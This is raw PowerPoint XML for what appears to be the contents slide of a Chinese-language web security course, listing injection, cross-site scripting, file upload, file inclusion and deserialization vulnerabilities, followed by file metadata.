                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>目录</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="组合 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC8E2ED7-7683-5F26-3314-E3907882ACB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2855640" y="1700808"/>
            <a:ext cx="6480720" cy="576064"/>
            <a:chOff x="3215680" y="2204864"/>
            <a:chExt cx="6480720" cy="576064"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="矩形 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{532F2316-F8C4-30CC-A0EE-C0ED10DFFCF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01</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1"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C38EC24-B8D7-6357-017D-1BCFE63759D3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4655840" y="2204864"/>
              <a:ext cx="5040560" cy="576064"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="D6D6D6"/>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28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kumimoji="1"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注入漏洞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0" name="组合 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0429C429-E869-FC2A-249C-4485661662EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2855640" y="2545459"/>
            <a:ext cx="6480720" cy="576064"/>
            <a:chOff x="3215680" y="2204864"/>
            <a:chExt cx="6480720" cy="576064"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="矩形 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{894D9F5F-EC52-A50D-1DFA-E26CD04C55BF}"/>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latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800"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356FB38-7F76-FBB1-BAC1-AFEF42D8FCFF}"/>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跨站脚本攻击</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2" name="组合 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{855A1210-A171-B368-8FFB-791E6AC43F99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2855640" y="3390110"/>
            <a:ext cx="6480720" cy="576064"/>
            <a:chOff x="3215680" y="2204864"/>
            <a:chExt cx="6480720" cy="576064"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36DF7540-BE08-FD1B-DAFA-58D87931D42B}"/>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03</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="28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AF729870-F782-3B11-E114-7E3B63D7B841}"/>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文件上传漏洞 </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6" name="组合 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4752977-AFBE-91BB-5EFD-D57DA1DF7B98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2855640" y="4229884"/>
            <a:ext cx="6480720" cy="576064"/>
            <a:chOff x="3215680" y="2204864"/>
            <a:chExt cx="6480720" cy="576064"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="矩形 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C183CBBE-633F-75AC-4F87-982AEB807369}"/>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04</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1"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2A91F8C-69D7-EC31-B78C-FD051A90CE66}"/>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文件包含漏洞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15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4A6C08E-F0D3-65F8-5E38-54620DB191B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2878912" y="5117021"/>
            <a:ext cx="6480720" cy="576064"/>
            <a:chOff x="3215680" y="2204864"/>
            <a:chExt cx="6480720" cy="576064"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="矩形 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F8E2C87-E2DD-7351-9A0F-E763C724D8F8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3215680" y="2204864"/>
              <a:ext cx="1440160" cy="576064"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="004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atin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>05</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">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D56E153E-FE61-54F4-E66C-F9F878A1DA82}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4655840" y="2204864"/>
              <a:ext cx="5040560" cy="576064"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="D6D6D6"/>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反序列化漏洞</a:t>
              </a:r>
              <a:endPar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091950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36594</TotalTime>
  <Words>7963</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>891</Paragraphs>
  <Slides>99</Slides>
  <Notes>84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99</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="107" baseType="lpstr">
      <vt:lpstr>等线</vt:lpstr>
      <vt:lpstr>等线 Light</vt:lpstr>
      <vt:lpstr>Microsoft YaHei</vt:lpstr>
      <vt:lpstr>Microsoft YaHei</vt:lpstr>
      <vt:lpstr>Microsoft YaHei</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Menlo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1</cp:lastModifiedBy>
  <cp:revision>187</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-07-11T02:43:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-27T07:49:24Z</dcterms:modified>
</cp:coreProperties>
</file>